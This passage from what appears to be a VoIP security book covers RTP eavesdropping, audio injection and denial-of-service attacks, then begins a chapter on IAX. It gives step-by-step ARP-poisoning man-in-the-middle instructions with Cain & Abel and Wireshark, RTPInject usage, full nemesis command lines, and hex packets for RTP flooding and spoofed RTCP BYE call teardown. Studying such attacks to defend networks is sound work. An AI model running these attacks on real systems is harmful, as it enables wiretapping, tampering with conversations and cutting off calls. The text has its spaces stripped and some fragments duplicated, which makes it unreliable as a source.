time,theissueshaveonlyrecentlycometothesurface,assecuritytools,suchasWiresharkandCain&Abel,havemadetheattackprocessquiteeasy.

Note✎

Onemightarguethatotherprotocols,includingHTTP,FTP,telnet,TFTP,POP3,andSMTP,alsotransmitincleartextwithlittlesecurityprotections;however,mostphoneusersassumeacertainlevelofprivacy,integrity,andreliabilitywiththeirconversations.Usersofmanysystem-levelprotocolsdonotalwaysmaketheseassumptions.

ThischapterdiscussesRTPsecurityasitpertainstoVoIP,includingspecificvulnerabilitieslikeeavesdropping,voiceinjection,andDenialofService.

RTPBasicsRTPisaUDPprotocolthatcanbeuseddynamicallyonports1024to65535.AlthoughRTPcanbeusedonanyUDPportgreaterthan1024,manyVoIPenterprisesolutions,suchasthoseofferedbyCiscoandAvaya,canbeconfiguredtousestaticportsforRTPpackets.Inaddition,majorsoftphonestendtousespecificrangesforRTP/RTCPconnectionsratherthanrandomlypickportsacrossconnections.ThebasicelementsofanRTPpacketarenodifferentfromthoseassociatedwithanyotherprotocol.RTPpacketsincludeasequencenumber,timestamp,payload(data),SRRC(synchronizationsource),andCSRC(contributingsource),asshowninthefollowinglist.SequencenumberThisisthevaluethatmaintainsstatebetweenVoIPendpoints.ThesequencenumberincreasesbyoneforeachRTPpacketsentbyoneendpoint.TimestampThetimestampholdsthetimeinformationfortheRTPconnection.Itshouldbenotedthatthetimestampisanindicationofthesamplingperiodoftheaudiopayloadinthe

packet,whichistypicallyincrementedby160ineachpacket.SynchronizationsourceThisisthesourceforpacketsynchronizationduringanRTPstream.ContributingsourceThisisacontributiontothesynchronizationsourceduringanRTPstream.

Note✎

TolearnmoreabouttheRTPprotocolandhowitworks,refertotheRFClocatedathttp://www.faqs.org/rfcs/rfc1889.html/.

SectionBoftheRTPRFC,"SecurityConsiderations,"liststhemanysecurityconcernsassociatedwiththeprotocol.Forexample,itdescribeshowusersmayassumemoreprivacyfromvoice(phone)communicationthanfromdata(e.g.,email)transmission,becauseofwhattheyexpectfromphoneconversationoverwiredtelephonelines.ThefirstsentenceinSection9oftheRFCalsostatesthatsecurityisexpectedtobeaddressedatlowerlevels,suchasIPSec.However,mostVoIPimplementationswillnotuseIPSecatlowerlevelstoprotectcallprivacy.Furthermore,theuseoflower-levelencryptionprotocolsmaydrasticallyreducetheperformanceofVoIPcommunication,causingtheaudioqualitytodegrade.Thesefacts,aswellasmanyotherswrittenintheRFC,hintatthesecurityissuesassociatedwiththeRTPprotocol.

RTPSecurityAttacksSecurityattacksonVoIPareusuallyfocusedoncapturingmedia(audio),whichinvolvesRTP.Thelackofencryptionand/orprivacyallowsseveraltypesofattacksfromunauthorizedusers,includinganonymous,unauthenticatedusers.

Note✎

WhileSecureRTP(SRTP),describedinChapter9,doesprovidesecurityformediacommunication,mostenterpriseorganizationshavenotimplementedSRTPbecauseofperformanceand/oroperationalissues.

RTPisvulnerabletomanytypesofattacks,includingtraditionalones,suchasspoofing,hijacking,DenialofService,andtrafficmanipulation,aswellasnewerones,suchaseavesdroppingandvoiceinjection.Inthefollowingsections,we'llfocusonthemostdangerousandsevereattacksonRTP,including:

PassiveeavesdroppingActiveeavesdroppingDenialofService

PassiveEavesdropping

RTP'scleartextpacketscanbesniffedoverthenetworkjustaswithtelnet,FTP,andHTTP.However,unlikesuchanattackontelnet,simplycapturingafewRTPpacketsoverthenetworkwillnotprovideanattackerwithallthesensitiveinformationheorshewants.ThisisbecauseRTPtransfersstreamsofaudiopackets,meaningthatanattackermustcaptureanentirestreaminordertocaptureaconversation.CapturingjustasingleRTPpacketwouldbelikecapturingtheletterSfromthis

sentence—you'dhaveonlyasingleletterandnoneoftherealinformation.WhilethismakesRTPeavesdroppingabittougherthaninterceptingsimplertraffic,theabilitytocaptureRTPaudiostreamsisstillverypossible.ToolslikeCain&AbelandWiresharkmakecapturingRTPstreamsoverthenetworkalmosteasy.ThesetoolscaptureasequenceofRTPpackets,reassembletheminthecorrectorder,andsavetheRTPstreamasanaudiofile(e.g.,.wav)usingthecorrectaudiocodec.Thisallowsanypassiveattackertosimplypoint,click,andeavesdroponalmostanyVoIPcommunicationwithinhisorherownsubnet.

CapturingPacketsfromDifferentEndpoints:Man-in-the-Middle

Aman-in-the-middleattackinvolvesanuntrustedthirdpartyinterceptingcommunicationbetweentwotrustedendpoints,asshowninFigure4-2.Forexample,let'ssaytwotrustedparties,SoniaandKusum,communicateviaatelephone.InordertocommunicatewithKusum,Soniadialsherphonenumber.WhenKusumanswersthephone,Soniabeginsthecommunicationprocesswithher.Duringaman-in-the-middleattack,anattackerinterceptstheconnectionbetweenSoniaandKusumandhasbothendpointscommunicatethroughhimorher.Inthisway,theattackereffectivelyactsastherouterbetweenSoniaandKusum.BothKusumandSoniacontinuetocommunicate,blissfullyunawareoftheattackersittinginthemiddleoftheircall,listeningin.Theattackislikeathree-wayphonecall,withtwoofthethreecallersunawareofthethirdone.Thegoalofaman-in-the-middleattackistosniffonaswitch,becauseswitchesdirecttraffictotheintendeddestinationportonly.Conversely,sniffingonahubispossiblebydefaultbecauseitallowsallportstoseeallcommunication,therebymakingitquiteeasytosniffaneighbor'straffic.ManyswitchesareLayer2devices,meaningthattheycan

transmitpacketsfromoneportonaswitchtoanothernode'smachineaddress(MAC)insteadofanIPaddress(typeipconfig/allonaWindowscommandlinetoseetheMACaddressnotedbyphysicaladdress).TheMACaddressisusedbythemanufactureroftheNICtoidentifyituniquely.Layer2routingiscommonforperformancereasons,allowingswitchestotransferpacketsquicklyacrossthenetwork.Thekeytoaman-in-the-middleattackistoupdatetheswitch,router,oroperatingsystem'sARPcache(Layer2routingtable)andtellitthataspecificIPaddressisnowassociatedwithanewMACaddress(thatoftheattacker).WhenasystemtriestocontactthelegitimateIPaddressviaitsLayer2MACaddress,itwillberoutedtotheattacker'smachinebecausethesystem'sARPtablewasmaliciouslyupdatedbytheattacker.

Figure4-2.Man-in-the-middleattack

InordertocompletethisattackasshowninFigure4-2,anattackerwouldsendanARPreplypackettothetwoVoIPphonesonthenetwork,tellingtheVoIPphonesthattheIPaddressof172.16.1.1isnow00-AO-CC-69-89-74,whichhappenstobetheLayer2MACaddressoftheattacker'smachine.OncetheARPpacketsarereceivedbythephones,thephoneswillautomaticallyupdatetheirownARPtable,denoting172.16.1.1as00-AO-CC-69-89-74.OnceeitherVoIPphonetriestocontacttheswitchattheIPaddressof172.16.1.1,itwillactuallyberedirectedtotheattacker's

machine.Inorderfortheman-in-the-middleattacktoworkasintended,theattackermustroutethatpackettothecorrectdevice,allowingbothpartiestocommunicatenormallywithoutknowingthatathirdpartyismonitoringthecommunication.Formoreinformationonman-in-the-middleattacks,refertohttp://www.grc.com/nat/arp.htm/.

UsingCain&AbelforMan-in-the-MiddleAttacks

OurexamplewilluseCain&Abel(writtenbyMassimilianoMontoro)tocaptureRTPpackets,reassemblethem,anddecodethemto.wavfiles.We'llstartbyusingCain&Abeltoperformaman-in-the-middleattackontheentirenetworksubnetandthenuseitsRTPsniffertocaptureallRTPpacketsandlistentothecapturedaudio.Herearethestep-by-stepinstructions:

1. DownloadandinstallCain&Abelfromhttp://www.oxid.it/cain.html/,usingthedefaults.

2. InstalltheWinPCappacketdriverifyoudon'talreadyhaveoneinstalled.

3. Reboot.4. LaunchCain&Abel.5. Selectthegreeniconintheupperleft-handcornerthat

lookslikeanetworkinterfacecard,asshowninFigure4-3.6. EnsurethatyourNIChasbeenidentifiedandenabled

correctlybyCain&Abel,thenselecttheSniffertab.7. Clickthe+symbolinthetoolbar.8. TheMACAddressScannerwindowwillappearand

enumeratealltheMACaddressesonthelocalsubnet.ClickOK.(Figure4-3showstheresults.)

Figure4-3.MACAddressScannerresults

9. SelecttheAPRtabatthebottomofthetooltoswitchtotheARPPollutionRoutingtab.

10. Clickthe+symbolonthetoolbartoshowalltheIPaddressesandtheirMACsasshowninFigure4-4.

Figure4-4.IPaddressesandtheirMACs

11. FromtheARPPoisonRoutingmenu,choosethetargetforyourman-in-the-middleattackfromthelistofIPaddresses

andtheircorrespondingMACaddressesasshownontheleftinFigure4-5.Themostlikelytargetwillbethedefaultgatewayinyoursubnetsothatallpacketswillgothroughyoufirstbeforetheyreachtherealgatewayofthesubnet.

12. Onceyouselectyourtarget,whichis172.16.1.1inourexample,selecttheVoIPendpoints(ontherightsideofthescreen)fromwhichyouwanttointercepttraffic.YoucanchoosealltheVoIPendpointsinthesubnetoraparticularone.We'llchoose172.16.1.119,asshowninFigure4-5.ClickOKonceyou'vemadeyourselections.

Figure4-5.Man-in-the-middletargets

13. Whenyou'vereturnedtothemainscreen,clicktheyellow-and-blackicon(secondfromtheleft)tostarttheman-in-the-middleattack.ThiswillallowtheuntrustedthirdpartytostartsendingARPresponsesonthenetworksubnet,telling172.16.1.119thattheMACaddressof172.16.1.1hasbeenupdatedto00-00-86-59-C8-94,asshowninFigure4-6.

Figure4-6.Man-in-the-middleattackinprocesswithARPpoisoning

14. Atthispoint,alltrafficfromendpointAtoendpointBisgoingthroughtheuntrustedthirdpartyfirstandthenonitsappropriateroute.TheuntrustedthirdpartycannowuseCain&Abel,Wireshark,orasimilarprogramtocapturetheRTPpacketsandreassemblethemintoacommonaudioformat.

15. SelecttheSniffertabatthetopoftheprogram.16. SelectVoIPfromthetabsatthebottom,asshownin

Figure4-7.IfVoIPcommunicationhasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemto.wavformat.AsshowninFigure4-7,Cain&Abelhascapturedafewphoneconversationsoverthenetwork.

UsingWireshark

TouseWiresharktoreassembleRTPpacketsandsavethemtoa.wavfile,continuefromstep14abovefortheman-in-the-middleattack,andthencompletethefollowingsteps:

1. DownloadandinstallWiresharkfromhttp://www.wireshark.org/,usingthedefaults.

2. InstalltheWinPCappacketdriverifyoudon'talreadyhaveoneinstalled.

Figure4-7.CapturedVoIPcommunicationviaRTPpackets

3. Reboot.4. StartWireshark,thenselectCapture►Interfacesfromthe

menubar.5. SelectOptionsfromtheinterfaceyouwanttosniff.6. IntheDisplayOptionssection,selectUpdatelistofpacketsin

realtime,Automaticscrollinginlivecapture,andHidecaptureinfodialog.

7. ClickStart.8. OnceWiresharkstartssniffingpackets,enterRTPinthe

FiltertextboxandclickApply.9. Once15or20RTPpacketsappear,stopthesniffer(Capture

►Stop).10. HighlightoneoftheRTPpackets.

11. SelectStatistics►RTP►StreamAnalysis,asshowninFigure4-8.

Figure4-8.WiresharkStreamAnalysisofcapturedRTPpackets

12. Atthispoint,youwillbeshownmoredetailsoftheRTPpacketsthathavebeensniffedoverthenetwork.Simplyselecttheconversation(row)youwishtolistentoandthenclickSavepayload.

13. WhentheSavePayloadAswindowappears,youaregiventheoptiontosavetheRTPstreamtoanaudiofile(assumingthecodecusedfortheaudiofileissupported).Selectthe.auradioboxastheformatinwhichyouwishtosavethefile,typethenameofthefile,andthenclickOK.(SeeFigure4-9.)

Figure4-9.SavingRTPpacketstoanaudiofile

14. Openandlistentothesavedaudiofile.

ActiveEavesdropping

Inadditiontopassiveeavesdroppingattacks,RTPisalsovulnerabletoactiveattacks.Thefollowingattacksdescribewhenanattackercansniffonthenetwork,usingsomethinglikeWireshark,andthenexecuteactiveattacks,suchasvoiceinjection,againstVoIPendpointssupportingRTP.InjectionattacksallowmaliciousentitiestoinjectaudiointoexistingVoIPtelephonecalls.Forexample,anattackercouldinjectanaudiofilethatsays"Sellat118"betweentwostockbrokersdiscussinginsidertradinginformation.ThereareafewwaystoinjectvoicecommunicationbetweentwoVoIPendpoints.We'lldiscusstwomethods,whichareaudioinsertionandaudioreplacement.Bothmethodsinvolvemanipulationofthetimestamp,sessioninformation,andSSRCofanRTPpacket.

AudioInsertion

ThesessioninformationbetweentwoVoIPendpointsis

controlledbya32-bitsignalingsource(SSRC)aswellasthe16-bitsequencenumberandtimestampnumber.TheSSRCnumberisarandomnumberthatensuresanytwoendpointswillusedifferentidentifierswithinthesameRTP.Althoughthelikelihoodofcollisionislow,theSSRCnumberensurestheuniquenessoftheidentifier.However,becausethesessioninformationissentincleartext,attackerscanviewitoverthenetwork.Also,becausemostvendorVoIPproductsdonottrulyrandomizeanyofthevalues,theabilitytoinjectRTPpacketsfromaspoofedsourceispossible.Thesequentialinformationallowsattackerstopredictthevaluesforeachstate-controllingentity,whichopensthedoorforinjectionattacks.

Note✎

InjectiontechniqueswereintroducedinatoolcalledHunt(availablefromhttp://packetstormsecurity.org/sniffers/hunt/hunt-1.5bin.tgz/),whichwouldinjectsessioninformationtohijacktelnetconnections.

RTPsessionsarealsovulnerabletoinjectionattacksbecausethepacketsdonotuserandominformationforsessionmanagement,inadditiontotheproblemthattheinformationissentincleartext.Forexample,foragivenRTPsession,thetimestampusuallystartswith0andincrementsbythelengthofthecodeccontent(e.g.,160ms);thesequencestartswith0andincrementsby1;andtheSSRCisusuallyastaticvalueforthesessionandafunctionoftime.Allthreeofthesevaluesareeitherpredictableinnatureand/orstatic.Anattackerwhoisabletosniffthenetworkcancreatepacketswiththecorrecttimestamp,sequence,andSSRCinformation,ensuringthatthepacketincreasesappropriatelyasspecifiedbythecurrentsession(usuallybyone).Oncetheattackerhaspredictedthecorrectinformation,heorshewillbeabletoinjectpackets(audio)intoanexistingVoIPconversation.Theabilitytogatherthecorrectinformationfor

thetimestamp,sequence,andSSRCcanbequiteeasybecausealloftheinformationtraversesthenetworkincleartext.Anattackercansimplysniffthenetwork,readtherequiredinformationfortheattack,andinjectnewaudiopackets.Furthermore,becausetheinformationisnotrandom,atoolcanbewrittentoautomatetheprocessandthusrequirelittleeffortonthepartoftheattacker.Figure4-10showsanexampleoftheRTPinjectionprocess.Noticethattheattacker'sSSRCnumberisthesameasthatofitstarget,butitssequencenumberandtimestampareinsyncwiththelegitimatesession,makingtheendpointassumethattheattacker'spacketsarepartoftherealsession.

Figure4-10.RTPinjection

CompletethefollowingstepstoinjectanaudiofileintoanexistingVoIPconversation.

1. DownloadRTPInject(writtenbyZaneLackeyandAlexGarbutt)fromhttp://www.isecpartners.com/tools.html/.

2. FollowtheReadme.txtfileforusageofaWindowsmachine.FortheLinuxversion,RTPInjectdependsonthefollowingpackages,whicharepre-installedonmostmodernLinuxsystems,suchasUbuntu,RedHat,andBackTrackLiveCD(mustberunwithrootprivileges):

Python2.4orhigherGTK2.8orhigherPyGTK2.8orhigher

3. InstallthepypcaplibraryincludedwithRTPInjectbyusingthefollowingcommands:

bash#tarzxvfpypcap-1.1.tar.gzbash#cdpypcap-1.1bash#makeallbash#makeinstall(*note:thisstepmustbeperformedasroot)

4. InstallthedpktlibraryincludedwithRTPInjectbyusingthefollowingcommands:

bash#tarzxvfdpkt-1.6.tar.gzbash#cddpkt-1.6bash#makeinstall

5. Performaman-in-the-middleattackonthenetwork(ifnecessary)usingdsniff(Linux)orCain&Abel(Windows),asdescribedearlierinthischapter,inordertocaptureallRTPstreamsinthelocalsubnet.

6. LaunchRTPInjectusingthefollowingcommands:bash#pythonrtpinject.py

7. OnceRTPInjectisloaded,itwillshowthreefieldsinitsprimaryscreen,includingtheSourcefield,theDestinationfield,andtheVoiceCodecfield.SeeFigure4-11forthedetailsoftheinjection.TheSourcefieldwillbeauto-populatedasRTPInjectdetectsRTPstreamsonthenetwork.WhenanewIPaddressappearsintheSourcefield,clicktheIPaddress,whichwillshowthedestinationVoIPphoneandvoicecodecbeingusedinthestream.

Figure4-11.RTPInjectmainwindow

8. RTPInjectthenautomaticallytranscodestheprovided.wavfileintothecorrectcodec(becauseRTPInjectdisplaysthevoicecodecinuse,theusercouldalsocreatetheaudiofilewiththepropercodecheorshewishestoinject).UsingWindowsSoundRecorderorSoxforLinux,createanaudiofileinthefileformatshownbyRTPInject,suchasA-Law,u-Law,GSM,G.723,PCM,PCMA,and/orPCMU.a. OpenWindowsSoundRecorder(Start►Programs►

Accessories►Entertainment►SoundRecorder).b. ClicktheRecordbutton,recordtheaudiofile,andthen

clicktheStopbutton.c. SelectFile►SaveAs.d. ClickChange.UnderFormat,selectthecodecthatwas

displayedinRTPInject.SeeFigure4-12.BothWindowsSoundRecorderandLinuxSoxaudioutilitiesprovidetheabilitytotranscodeaudiotomostofthecommoncodecsused.

Figure4-12.WindowsSoundRecodercodec

e. ClickOKandthenSave.9. Oncethisaudiofilehasbeencreated,clickthefolder

buttononRTPInjectandnavigatetothelocationofthefilerecordedinStep6.SeeFigure4-13.

Figure4-13.Selectdialog

10. WiththeRTPstreamandaudiofileselected,clicktheInjectbutton.RTPInjectinjectstheselectedaudiofiletothedestinationhostintheRTPstream.SeeFigure4-14.

Figure4-14.InjectionaudiowithRTPInject

AudioReplacement

Asmentionedpreviously,thesessioninformationbetweentwoVoIPendpointsiscontrolledbytheSSRC,sequencenumber,andtimestampnumber.Unliketheaudioinsertionattack,theaudioreplacementattackdoesnotinjectaudioduringanexistingphoneconversationbutreplacestheexistingaudioduringacall.Forexample,iftwotrustedendpointsareholdingaphoneconversation,anattackercanreplacethelegitimateaudioinformationwiththeattacker'sowninformation.Insteadofhearingthecommunicationfromeithersource,theendpointswouldbelisteningtowhattheattackerchooses.Audioreplacementwouldbehighlydamagingincaseswheremanyendpointsarelisteningtoasinglesource,suchascompanyconferencecalls.Inordertoreplacetheexistingaudiostream,theattackerneedstosendRTPpacketswithahighersequencenumberandtimestamp,butusingthesameSSRCinformation.ThetargetwillthenseeRTPpacketswithasingleSSRCnumber,onefromthelegitimateendpointandonefromtheattacker.However,whentheendpointseesthattheattacker'spackethasahigher

whentheendpointseesthattheattacker'spackethasahighertimestampandsequencenumber,itwillassumethattheattacker'spacketsarethemostcurrentandthuscontinueonwithitsinformation.Thehighersequencenumberandtimestampontheattacker'spacketsmakesthelegitimateendpoint'spacketinformationlookoldandoutdated.Oldandoutdatedpacketinformationwouldbediscardedbythetargetinfavorofthemostrecentinformationonthenetwork,whichinthiscasehasbeenprovidedbytheattacker.Thistechniqueallowstheattacker'spackettolookcurrentwhiletheendpoint'spacketslookoldandinvalid.Asaresult,thetargetreceivesthepacketinformationfromtheattackerandplaystherogueaudioinformation,whichcanbewhatevertheattackerwishestoplay.Forthisattacktooccur,theattacker'ssequenceinformationandsessionIDinformationmustalwaysbehigherthanthatoftherealendpoint.Figure4-15showsanexampleoftheRTPreplacementprocess.Noticethattheattacker'sSSRCnumberisthesameasitstarget,butitssequencenumberandtimestamparemuchhigherthaninthelegitimatesession.Thisforcesthereceivingendpointtoassumethatthelegitimatephone'spacketsareold.

Figure4-15.RTPinjectionaudioreplacement

DenialofService

TherearemanywaystocarryoutaDenialofServiceattackonaVoIPinfrastructure,includingtargetingtheRTPprotocol.DenialofServiceattacksarealoteasiertocarryoutonsessionsetupprotocols,suchasattacksonH.323andSIP,butcanalsobeperformedonRTP.UnlikeH.323andSIP,whenaDoSattackoccursontheRTPprotocolitself,theimpactishigherastheRTPprotocolcontrolstheaudioportionofacall.ThissectiondiscussesthefollowingtypesofRTPDoSattacks(thereareseveralmoreRTPDoSattacks,butthissectionwilldiscussonlythetopthree):

MessagefloodingRTCPBYE(sessionteardown)SSRCinjection

MessageFlooding

TheeasiestwaytocarryoutaDoSattackduringanRTPsessionistofloodoneendofanexistingVoIPcallwithanenormousamountofRTPpackets.Becauseauthenticationisassumedtohavebeenprovidedbyotherprotocols,suchasH.323orSIP,RTPendpointsareforcedtorevieweachpacketsenttothem(assumingtheyareallpacketsofanexistingcall).Duringacall,twoentitiessendRTPpacketstoeachother,containingtheaudioinformationforthecall.TheRTPpacketsidentifytheuniquecallbasedontheSSRCnumber.EverytimeanRTPpacketisreceivedbyanendpointwiththesameSSRCvalue,acertainamountoftimeisrequiredfortheendpointtoreviewthepacketanddeterminewhethertoacceptordropit,evenifthatpacketturnsouttobeboguswithincorrectinformation.Repeatedoverandoverseveralthousandtimesasecond,thispacketreviewcanbecostly.ThelegitimateRTP

second,thispacketreviewcanbecostly.ThelegitimateRTPpacketsmustcompetefortheendpoint'stimeorwaitinlineforreview,causingtheexistingRTPcommunicationstreamtoslowdownorsimplystop.AslowdownorstoppageintheRTPstreamwilldisruptthecall,leadingtoaDenialofServiceattack.CompletethefollowingstepstoexecuteaDoSattackonRTPcommunication.

1. UsingNemesisorSnifferPro,createanRTPpacketandsendittoanendpointthathasanexistingVoIPcallwithRTPpackets.We'lluseNemesis,whichcanbefoundathttp://www.packetfactory.net/projects/nemesis/,fromtheBackTrackLiveCD.

2. StartNemesisfromtheBackTrackLiveCD.3. SniffthenetworkandfindanexistingVoIPcallusingRTP.

NotethesourceIP,destinationIP,andportsbeingusedwithRTP.

4. DownloadiSEC.RTP.Flood.DOSfromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/We'llusethisastheinputfilewithNemesisinordertoexecutetheRTPDoSattack.

5. Withahexeditor,edittheSSRCinformationtomatchtheoneyouhavesniffedoverthenetwork.Theauthor'sSSRCnumberis909524487(step8),butthisvalueshouldbechangedtomatchthevalueofthecallyouwishtoterminate.

6. Oncethefileisdownloaded,executethenemesiscommandinstepbusingthepreviouslabinformation:a. NetworkInformation

i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP:172.16.1.140

iv. Target'sMAC:02:34:4F:3B:A0:D3v. ExistingRTPport(thismustbesniffedbythe

attacker):42550b. ExampleSyntax:

nemesisudp-x42550-y42550-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.RTP.Flood.DOS

7. IssuethecommandrepeatedlyforaslongasyouwanttheDoSattacktooccur(itmightbebettertocreateascripttorepeatthisindefinitely).

8. ThefollowinghexinformationistheexamplepacketwithRTPfloodinformation.BesuretouseahexeditorifyouwishtomodifythisfileforusewithNemesis:

800018232f1d8e8d36363e07e9ead4d0ec5c517bcdd55defdbf372e6d97e6c756257edd2e74c445ce25b4ad5c577e8c7c0d8545efc55454f473b3530487c63cdc0cacab2bbb6b475dae53c36373e3e354af66a74e2c3bdb8bbbfc4d7dae64b456aef4e46506dc1d0d0bfcad76b766b3e3f4b4b635deac5483fa4b42fbab6354fb93b2b38e3ad5548b25e3bcbb24e3dc0bac73240bc4847c0f33462bed8e2553d45d8b3c7373dc7c24c5fdd5c

Done!YouarenowfloodingaVoIPendpointwithanRTPcommunicationstreamwithbogusRTPpackets.Overtime,theexistingcallshouldbesloweddownorsimplydropped(dependingonhowlongyousendtheabovepacket).

RTCPBye(SessionTeardown)

ThenextDenialofServiceattackwewilldiscussusesspoofedinformation.DuringanRTPconnection,RTCPcanbeuseforsynchronization,QualityofServicemanagement,andseveralothersessionsetup,maintenance,andteardownresponsibilities.Aswiththemessagefloodingissue,RTPassumesthatauthenticationhastakenplacewithother

protocols;hence,anypacketsenttoitisconsideredforreview.Asaconsequence,anattackerwhocansniffthenetworkcanspoofanRTCPBYEpacketandforcetheendpointtoterminatethecall.AnRTCPBYEmessagesimplyindicatesthatoneoftheendpointsisnolongeractiveorthattheRTPsessionshouldnotbeusedanylonger.BYEmessagescanoccurforavarietyofreasons,rangingfromduplicateSSRCmessagestoadisappearingendpoint.IfaBYEmessageisreceivedbyanendpoint,thatendpointassumesthattheotherendpointithasbeencommunicatingwithcannolongerreceiveorsendRTPcommunication;thus,thesessionisclosed.InorderfortheBYEmessagetobespoofedbyanattackerandusedtoendacall,theattackerneedstoknowthecorrectsource,destination,port,andSSRCinformationbetweenthetwopartiestoanexistingVoIPcall.CompletethefollowingstepstoexecuteaDoSattackusingRTCPBYEmessages.

1. UsingNemesisorSnifferPro,createanRTPpacketandsendittoanendpointthathasanexistingVoIPcallwithRTPpackets.We'lluseNemesisinthisexample.

2. StartNemesisfromtheBackTrackLiveCD(http://nemesis.sourceforge.net/).

3. SniffthenetworkforanexistingVoIPcallusingRTP.NotethesourceIP,destinationIP,ports,andSSRCinformationbeingusedwiththecall.

4. DownloadiSEC.RTCP.BYE.DOSfromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/tobeusedastheinputfilewithNemesisinordertoexecutetheRTCPDOS.

5. Withahexeditor,edittheSSRCinformationtomatchtheoneyouhavesniffedoverthenetwork.Theauthor'sSSRCnumberis909524487(asinstep8).Changethisvaluetomatchthevalueofthecallyouwishtoterminate.

6. Oncethefileisdownloadedandhasbeenupdated,executethenemesiscommandinstepbwiththepreviouslabinformationinstepa:a. NetworkInformation

i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP:172.16.1.140iv. Target'sMAC:02:34:4F:3B:A0:D3v. ExistingRTPport(thismustbesniffedbythe

attacker):42550b. ExampleSyntax:

nemesisudp-x42550-y42550-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.RTCP.BYE.DOS

ThefollowinghexinformationistheexamplepacketwithRTCPBYEinformation:

81cb000c36363e07

Done!YouhavesentanRTCPBYEmessagetoaVoIPendpointwithanexistingRTPcommunicationstream.Oncetheendpointprocessesthepacket,thecallshouldbesloweddownandthendropped.

SummaryRTPisthemostpopularcommunicationprotocolforVoIPnetworks.WhetheritisusedwithSIPorH.323,itisresponsiblefortheaudiocommunicationonceacallhasbeensetup.WhileSIPandH.323havetheirownsecurityissues,theuseofRTPintroducesmanymore.RTPassumesthatasignificantamountofsecurityiscomingfromelsewhereduringaVoIPcall,allowingittobeabsentofmanybasicsecurityprotectionswithauthentication,authorization,andencryption.TheprimaryitemsusedtocontrolRTPpacketsbetweenanytwoentitiesarethesessioninformation,timestamp,andSSRCinformation.Alloftheseitemsareeasilyspoofablebyattackersorunauthorizedinternalusers,allowingmaliciouspersonneltoperformseveraltypesofattacksdirectlyonRTP,includingeavesdropping,voiceinjection,andDenialofService.Eavesdropping,voiceinjection,andDenialofServiceattacksarebasicallytheworst-casescenarioforanyvoiceconversation,forthefollowingreasons:

TheabilityofattackerstolistentophonecallsbetweentwotrustedentitiesremovesanyguaranteeofconfidentialityonaVoIPcall.TheabilityofanattackertoinjectaudioduringexistingconversationseliminatestheintegrityofaVoIPcall.TheabilityofattackerstoendacallforciblyeliminatesthereliabilityoftheVoIPcall.

Withoutconfidentiality,integrity,andreliability,RTPsessionsareleftsorelylackinginsecurity.WhenbuildingaVoIPnetworkusingRTP,itisimportanttoknowaboutthemajorproblemswithauthentication,authorization,andencryptionthatstemfromitsnatureas

cleartextcommunication.ThischapterhasfocusedontheflawswithRTPsothatusersmayunderstandtherisk.Chapter9willdiscussdefenses,includingpossibledefensestoRTP,suchasSecureRTP.

Chapter5.SIGNALINGANDMEDIA:IAXSECURITY

Inter-AsteriskeXchange(IAX[2])isaprotocolusedforVoiceoverIP(VoIP)communicationwithAsteriskservers(http://www.asterisk.org/),anopensourcePBXsystem.AlongwithAsteriskservers,IAXcanbeusedbetweenanyclientendpoint[3]andserversystemsupportingtheIAXprotocolforvoicecommunication.IAXismuchsimplerthanotherVoIPprotocolssuchasH.323.Forinstance,IAXusesasingleUDPport(port4569)betweenallendpointsandservers.ThisfeaturemakesIAXveryattractiveforfirewalladministrators,whoareoftenaskedtoopenmanyportshigherthan1024forVoIPcommunication.Additionally,IAXprovidesforbothsignalingandmediatransferwithintheprotocolitself,whileotherVoIPimplementationsuseseparateprotocols,likeH.323orSIPforsignalingandRTPformediatransfer.Theuseofmultipleports/protocolsinVoIPoftenmakesthenetworkmoreconfusingthanfiguringoutwheretheLineofControlsitsbetweenIndiaandPakistan.Regardingsecurity,thedraftRFCtellsusthatIAXusesabinaryprotocolandclaimstoofferahigherdegreeofprotectionagainstbufferoverrunattacks[4]thanASCIIprotocolssuchasSIP.IAXalsooffersRSApublic-keyauthenticationandcallconfidentialitythroughAES.However,despitetheimportanceofthesesecurityfeatures,theyarefrequentlyabsentinIAXdeployments.ThisleavesmanyIAXimplementationsasvulnerableasunprotectedSIPorH.323systems.BecauseIAXstillsupportscleartextcommunication,unencryptedvoiceconversationscanbesniffed,recorded,andreplayedbyeavesdroppers.ThecommonlyusedMD5challenge/responseauthenticationmechanismspecifiedbyIAX

alsoallowspassiveandactiveadversariestolaunchseveralkindsofattacks.Theseattacksincludeofflinedictionaryattacksoncredentialsandpre-computeddictionaryattacks.Additionally,MD5authenticationisoftenvulnerabletoman-in-the-middleattacksandpotentiallytodowngradeattacks(dependingupontheimplementation).Finally,severalDenialofServiceattacksarepossible,addingtotheavailabilityconcernsofIAX(i.e.,servicesbeingupandrunning).Similartoanyunauthenticatednonprivateprotocol,manydatedsecurityattackscanbecarriedout,regardlessofwhetherthecommunicationisusingIAX,SIP,H.323,RTP,SCCP,oranyotherVoIPprotocol.ThischapterwillfocusonIAX,buttheattackclassescanbeassumedforanyprotocolwithsimilarstructure.FormoreinformationontheIAXarchitecture,seehttp://tools.ietf.org/html/draft-guy-iax-04/.TheRFCiscurrentlyindraft,sotherewillbemanyrevisionstoitbeforefinalapproval.ThesecurityaspectssupportedbyIAXimplementationswillbetheprimaryfocusofthischapter,specificallyauthentication,passwordprotection,andavailability.

IAXAuthenticationIAXsupportsthreeauthenticationmethods:MD5authentication,plaintextauthentication,andRSAauthentication.RSAauthenticationisnotwidelydeployed;however,itisthestrongestsecurityoption.Theattacksurface(theexposureanyentityhastoanattack)forRSAauthenticationisnotonlysmall,butitsuseofpublicandprivatekeysgreatlystrengthenstheauthenticationmodelagainstpassiveandactivenetworkattacks.Conversely,plaintextauthenticationisbyfartheworstmethodtobeusedwithIAX.Plaintextauthenticationpassestheusernameandpasswordintheclear,makingthenetworkvulnerabletonumerousattacksandpassiveeavesdroppers.ThemostwidelyusedauthenticationmethodisMD5.IntheMD5authenticationprocess,IAXendpointsuseachallenge/responsesystembased

